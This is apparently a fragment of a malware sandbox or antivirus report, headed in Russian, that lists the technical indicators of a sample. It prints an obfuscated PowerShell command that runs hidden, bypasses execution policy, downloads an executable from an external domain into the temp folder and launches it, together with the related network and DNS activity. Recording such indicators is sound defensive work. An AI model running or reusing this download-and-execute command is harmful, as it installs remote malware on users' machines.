Техническая информация
- https://a.safe.moe/msohy.exe как %temp%\\anyfilename.exe
- '<SYSTEM32>\cmd.exe' /C pOwERsHell.Exe -WindowSTYLE HIdden -nOprOFIlE -eXEcUTIonpolICY byPass (NEw-OBJeCt SYSteM.NET.WeBClIENt).DoWNlOAdFiLE('https://a.safe.moe/mSOhY.exe','%TEMP%\\anyFileName.exe') & %TEMP%\\anyFi...
- 'a.##fe.moe':443
- DNS ASK a.##fe.moe
- '<SYSTEM32>\cmd.exe' /C pOwERsHell.Exe -WindowSTYLE HIdden -nOprOFIlE -eXEcUTIonpolICY byPass (NEw-OBJeCt SYSteM.NET.WeBClIENt).DoWNlOAdFiLE('https://a.safe.moe/mSOhY.exe','%TEMP%\\anyFileName.exe') & %TEMP%\\anyFi...' (со скрытым окном)